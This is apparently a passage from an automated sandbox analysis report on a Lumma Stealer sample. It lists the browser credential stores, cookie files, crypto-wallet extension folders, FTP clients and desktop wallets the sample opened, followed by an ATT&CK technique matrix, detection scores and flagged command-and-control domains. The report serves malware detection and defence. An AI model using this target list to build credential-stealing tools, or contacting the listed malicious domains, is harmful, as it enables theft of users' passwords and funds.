                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: Yara matchFile source: 00000003.00000003.1481155531.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1480945277.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1480812391.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: uUtgy7BbF1.exe PID: 7580, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: uUtgy7BbF1.exe PID: 7580, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares3
                Clipboard Data
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                uUtgy7BbF1.exe69%VirustotalBrowse
                uUtgy7BbF1.exe68%ReversingLabsWin32.Trojan.LummaStealer
                uUtgy7BbF1.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://volcanohushe.click/T100%Avira URL Cloudmalware
                https://volcanohushe.click/100%Avira URL Cloudmalware
                https://volcanohushe.click/apiNA100%Avira URL Cloudmalware
                https://volcanohushe.click/apiND100%Avira URL Cloudmalware
                https://volcanohushe.click/api100%Avira URL Cloudmalware
                https://volcanohushe.click:443/apiCLSID100%Avira URL Cloudmalware
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.0%Avira URL Cloudsafe
                https://volcanohushe.click/apip100%Avira URL Cloudmalware
                volcanohushe.click100%Avira URL Cloudmalware
                https://volcanohushe.click/apis100%Avira URL Cloudmalware
                https://volcanohushe.click/ND100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                volcanohushe.click
                104.21.71.155
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  wordyfindy.latfalse
                    high
                    curverpluch.latfalse
                      high
                      slipperyloo.latfalse
                        high
                        tentabatte.latfalse
                          high
                          manyrestro.latfalse
                            high
                            shapestickyr.latfalse
                              high
                              talkynicer.latfalse
                                high
                                https://volcanohushe.click/apitrue
                                • Avira URL Cloud: malware
                                unknown
                                bashfulacid.latfalse
                                  high
                                  volcanohushe.clicktrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
